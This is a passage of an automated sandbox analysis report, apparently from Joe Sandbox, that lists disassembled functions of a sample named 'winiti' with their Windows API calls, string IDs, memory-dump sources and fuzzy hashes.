                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 81eb4f473b5f6baa680c7093f92d2b26f8a37406559a141903ec7adff4e5ed1f
                  • Instruction ID: a43def96e9fb57b47a8e80f52bcd9c17bac3dcbab2ea93528cef86e89ddcf819
                  • Opcode Fuzzy Hash: 81eb4f473b5f6baa680c7093f92d2b26f8a37406559a141903ec7adff4e5ed1f
                  • Instruction Fuzzy Hash: 6031AF32B01B51C2EA158B16E50039A73E4EB49FE4F048679DF5C57B98EF38CA678380
                  Function 000000013F630630 Relevance: 2.5, APIs: 2, Instructions: 28COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 000000013F6029C0: VirtualFree.KERNELBASE ref: 000000013F6029CA
                  • EnterCriticalSection.KERNEL32(?,?,?,000000013F6166E9,?,?,?,000000013F61C70D), ref: 000000013F630662
                  • LeaveCriticalSection.KERNEL32(?,?,?,000000013F6166E9,?,?,?,000000013F61C70D), ref: 000000013F63068C
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterFreeLeaveVirtual
                  • String ID:
                  • API String ID: 1320683145-0
                  • Opcode ID: 104b6b8d726536473a8dfb620195b120dc1c760eb9325624558afd6144496d8f
                  • Instruction ID: 4f01b0623b0ad8715dbbbd66f6b1b57a01014ed4bc4ed50855e18ae619841976
                  • Opcode Fuzzy Hash: 104b6b8d726536473a8dfb620195b120dc1c760eb9325624558afd6144496d8f
                  • Instruction Fuzzy Hash: 91F0AF72D04A10D2EA148B11F9C93E927F0F7447D0F554179EADD029B9CB38CA8BC700
                  Function 000000013F6028F0 Relevance: 2.5, APIs: 2, Instructions: 17memoryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: Virtual$AllocFree
                  • String ID:
                  • API String ID: 2087232378-0
                  • Opcode ID: 39155d9e0f21e472d4726bd40e7b7375b22274d9dbcec4a77f59ee3cc5932518
                  • Instruction ID: 35ca85bca57381af152161f5d28af1f23d0407ca12d671c76c5d2c76622eb9d4
                  • Opcode Fuzzy Hash: 39155d9e0f21e472d4726bd40e7b7375b22274d9dbcec4a77f59ee3cc5932518
                  • Instruction Fuzzy Hash: D8E01274F1250082FB1C9B27A84B79527916B9DB40FD4843CC40D47351DE29875B9F50
                  Function 000000013F60744E Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: BreakDebug
                  • String ID:
                  • API String ID: 456121617-0
                  • Opcode ID: 7460946a867b334da87abb833cff141128d26cc53670839ff519a9e4497aa03f
                  • Instruction ID: ef1ef7b6f4dbeb5aa02b9fab033331307017333c45e0172871aea3139a467633
                  • Opcode Fuzzy Hash: 7460946a867b334da87abb833cff141128d26cc53670839ff519a9e4497aa03f
                  • Instruction Fuzzy Hash: B241B3B2F08A4583FA54CA11D4427E963A5E394BE0F24423ADE6A577C9DF38CA43C740
                  Function 000000013F5F5920 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: ExceptionFailFastQueryRaiseVirtual
                  • String ID:
                  • API String ID: 3307674043-0
                  • Opcode ID: 1eb33025fcb74d676cc7358ae85899384f83db43159bf41c0ac61a9e8579e1b9
                  • Instruction ID: 5d076765fbf7b1db1f7f7a1a2ca37f17446293fd08e9949d12868d7a4b41ff76
                  • Opcode Fuzzy Hash: 1eb33025fcb74d676cc7358ae85899384f83db43159bf41c0ac61a9e8579e1b9
                  • Instruction Fuzzy Hash: DD115AB2A0478482DB24AB65B4063CAB360F3457B0F144339A6BE47BD6DF38C6078700
                  Function 000000013F6029C0 Relevance: 1.3, APIs: 1, Instructions: 7COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: FreeVirtual
                  • String ID:
                  • API String ID: 1263568516-0
                  • Opcode ID: 5bf7aecc9f77985d4fc3611f7f1d3a7e0808b60eb16f243669942d2759ca37ea
                  • Instruction ID: 0e99d502d7ab29a07f77347c863c0041619cf0d33133fcbea642a3c70f6d471f
                  • Opcode Fuzzy Hash: 5bf7aecc9f77985d4fc3611f7f1d3a7e0808b60eb16f243669942d2759ca37ea
                  • Instruction Fuzzy Hash: C4B01210F12000C2E30427237C87B0C17142B09B12FC40018C608A2350C91C82E62B10

                  Non-executed Functions

                  Function 000000013F602A80 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81memoryCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: Process$AllocCurrentTokenVirtual$AdjustCloseErrorHandleLargeLastLookupMinimumNumaOpenPagePrivilegePrivilegesValue
                  • String ID: SeLockMemoryPrivilege
                  • API String ID: 1752251271-475654710
                  • Opcode ID: ddb9acfd945d833e265492e35a954827198e86c4bc086900fbe4fb1499a4b753
                  • Instruction ID: a631504ee5ccf36ceb0252255e6a2383b96782c5b9d41d6f00dab553f9949252
                  • Opcode Fuzzy Hash: ddb9acfd945d833e265492e35a954827198e86c4bc086900fbe4fb1499a4b753
                  • Instruction Fuzzy Hash: 74317671A08B4586F7209F65F84A3DA7BA1FB85B88F14403DDA4E47B69DF3CC6468B40
                  Function 000000013F5F80B0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 248COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: ExceptionFailFastRaise
                  • String ID: [ KeepUnwinding ]
                  • API String ID: 2546344036-400895726
                  • Opcode ID: ccef75ce2b4fd517aeb3d753c38118d6ca4b9bf99982452ca9f0cb54815e2628
                  • Instruction ID: bc03652797d1547fed7e402512543eb8b70ebd777d305989926618b52126d6aa
                  • Opcode Fuzzy Hash: ccef75ce2b4fd517aeb3d753c38118d6ca4b9bf99982452ca9f0cb54815e2628
                  • Instruction Fuzzy Hash: 72C18972A01B44C2EB95CF25E5857DD33A5F344B89F58527ACE490B3A8DF31C6AAC350
                  Function 000000013F5FAB80 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 85libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: ContextInitialize$AddressEnabledErrorFeaturesHandleLastModuleProcState
                  • String ID: InitializeContext2$kernel32.dll
                  • API String ID: 4102459504-3117029998
                  • Opcode ID: 32bbcba0a65d150fc54e544dc3aa3406b0ed7865d1078f9dde3bace6e9329ecd
                  • Instruction ID: c766fb000b4fa87926274620f2bc9ad9efc7041a2b440ce7fef6fb718d29ee76
                  • Opcode Fuzzy Hash: 32bbcba0a65d150fc54e544dc3aa3406b0ed7865d1078f9dde3bace6e9329ecd
                  • Instruction Fuzzy Hash: 4C318D31E05B88C2FB058B55F94639AA390BB84B94F444479ED4D43BA8EF7CD64BC710
                  Function 000000013F5F5EA0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 83threadlibraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: Thread$AddressContextErrorLastLibraryLoadProcResumeSuspend
                  • String ID: QueueUserAPC2$kernel32
                  • API String ID: 3714266957-4022151419
                  • Opcode ID: 2c927c7249ad306362750963f21d316bcf2fc60d905bd8730f4bf37492db24bc
                  • Instruction ID: b4d72bed61675486795058888588dceaafb2d69e3f8acd7cfea4761865988793
                  • Opcode Fuzzy Hash: 2c927c7249ad306362750963f21d316bcf2fc60d905bd8730f4bf37492db24bc
                  • Instruction Fuzzy Hash: 79318274B00B40C2EA549B19E9583E933A1BB45BF4F4412BCD96A8BBE5DF2CC64BC741
                  Function 000000013F60DBE0 Relevance: 10.7, APIs: 7, Instructions: 227threadCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: SwitchThread
                  • String ID:
                  • API String ID: 115865932-0
                  • Opcode ID: c13f5500ea1206e8ec5f05ebe3918e2a796096b40ac2d42ce93c8136b207df3a
                  • Instruction ID: 10a9e1d0390f57fdeada19e25c3cd208c79995c06b1c67b84ddbf1f411bff0e6
                  • Opcode Fuzzy Hash: c13f5500ea1206e8ec5f05ebe3918e2a796096b40ac2d42ce93c8136b207df3a
                  • Instruction Fuzzy Hash: B1A1ACB1F08603C7F7589B25AC86BE627B5AB21754F20037DE919876EADF24DA07C700
                  Function 000000013F5F62A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51threadCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: Current$Thread$DuplicateExceptionFailFastHandleProcessQueryRaiseVirtual
                  • String ID:
                  • API String ID: 510365852-3916222277
                  • Opcode ID: aac18b405e8186b4baee27d6e985e552b0b39ad9a33c4f5303744330f0df3245
                  • Instruction ID: 9f16e0870d44e2a58a403c39efc5c7a1855a292645cadaa2ab99e1bf984dd7a7
                  • Opcode Fuzzy Hash: aac18b405e8186b4baee27d6e985e552b0b39ad9a33c4f5303744330f0df3245
                  • Instruction Fuzzy Hash: F611AEB2A04B84CAD760EF69B4413CA7360F3457B4F181339A6BD4BBD6CB74C6468B00
                  Function 000000013F61D600 Relevance: 9.2, APIs: 6, Instructions: 189threadCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: SwitchThread
                  • String ID:
                  • API String ID: 115865932-0
                  • Opcode ID: 01a89e310edcfaae1fb5271710d384d3bec56e2db4509541efe95d0668bf02e1
                  • Instruction ID: 78153649ae04c5e4675b1065240a8adc1915d2f6f770a92d8227675a3af16587
                  • Opcode Fuzzy Hash: 01a89e310edcfaae1fb5271710d384d3bec56e2db4509541efe95d0668bf02e1
                  • Instruction Fuzzy Hash: E681B271F00641C7FB989B29A8867EA3790AB40394F14017DE969873EBDB39CA47DB40
                  Function 000000013F61A150 Relevance: 9.2, APIs: 6, Instructions: 180COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 775818c12bc7e14b7563a559daced99b5b62968cc71ab8af9d358da41de0e075
                  • Instruction ID: 4468a35e14258bf22430f18426f27cb062aadb8cc564ead3e124c49e91998e25
                  • Opcode Fuzzy Hash: 775818c12bc7e14b7563a559daced99b5b62968cc71ab8af9d358da41de0e075
                  • Instruction Fuzzy Hash: B471BCB2B05B80C2FB189B61AA463E967E1F754BD8F08457DDE4947B9ADF38C652C300
                  Function 000000013F61FAE0 Relevance: 7.8, APIs: 6, Instructions: 317COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeave
                  • String ID:
                  • API String ID: 3168844106-0
                  • Opcode ID: 418b0774b7d3228d4d9ac1118a31d47de2794695f603a46847a331a745cbe1d0
                  • Instruction ID: abed8c394a4d8a55167ca6df4cfa803edc6deb3dff1b051ea7af765fb4538716
                  • Opcode Fuzzy Hash: 418b0774b7d3228d4d9ac1118a31d47de2794695f603a46847a331a745cbe1d0
                  • Instruction Fuzzy Hash: 84E19FB2B01A559ADA548F65E954BE863A1FB047F4F80433AD93D57BDDDB34C21AC300
                  Function 000000013F5F3680 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: ExceptionFailFastRaise
                  • String ID: Process is terminating due to StackOverflowException.
                  • API String ID: 2546344036-2200901744
                  • Opcode ID: fe34fe60a8b53b133f424caca37e213f3d652fd43d92ea617847fbec9e1bc9e9
                  • Instruction ID: 3d5fea04b7b74230ec1840f805b00535d56c1d3328ec789a78e2a6e158785014
                  • Opcode Fuzzy Hash: fe34fe60a8b53b133f424caca37e213f3d652fd43d92ea617847fbec9e1bc9e9
                  • Instruction Fuzzy Hash: 3A51D772F12B44C2FF549B1AE4503E92390E758B94F4984BEDA1E437A4DF29C69BC300
                  Function 000000013F632FB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 73libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryExW.KERNEL32(?,?,?,?,000000013FC00000,000000013F6330AD,?,?,00000000,000000013F61FA9C,?,FFFFFFFF,47AE147AE147AE15,000000013F60964C), ref: 000000013F633002
                  • GetProcAddress.KERNEL32(?,?,?,?,000000013FC00000,000000013F6330AD,?,?,00000000,000000013F61FA9C,?,FFFFFFFF,47AE147AE147AE15,000000013F60964C), ref: 000000013F63301C
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: AddressLibraryLoadProc
                  • String ID: GetEnabledXStateFeatures$kernel32.dll
                  • API String ID: 2574300362-4754247
                  • Opcode ID: 0d1bad6a7b8d3c1afb901e75ce55123fadd1554c836fe95c377a29b41be358a4
                  • Instruction ID: 7e50d20fc654da334f45e9b516ee03740c09f0b74b88723abc9cb66276187586
                  • Opcode Fuzzy Hash: 0d1bad6a7b8d3c1afb901e75ce55123fadd1554c836fe95c377a29b41be358a4
                  • Instruction Fuzzy Hash: 5D21D0B2F2525042FFB88739E5577FD5381D398794F8C803FC90A86AE5DA1DCAC28A00
                  Function 000000013F5FB1D0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: AddressLibraryLoadProc
                  • String ID: GetEnabledXStateFeatures$kernel32
                  • API String ID: 2574300362-4273408117
                  • Opcode ID: 532f177c9a3abf93edbeefab53f090ab908d42bf1be2dcd3b1f8b265f2863a08
                  • Instruction ID: 16567847ea2e4cd399e11dd8db8a8b15bbe820be492245a21c8aff00b179f6f4
                  • Opcode Fuzzy Hash: 532f177c9a3abf93edbeefab53f090ab908d42bf1be2dcd3b1f8b265f2863a08
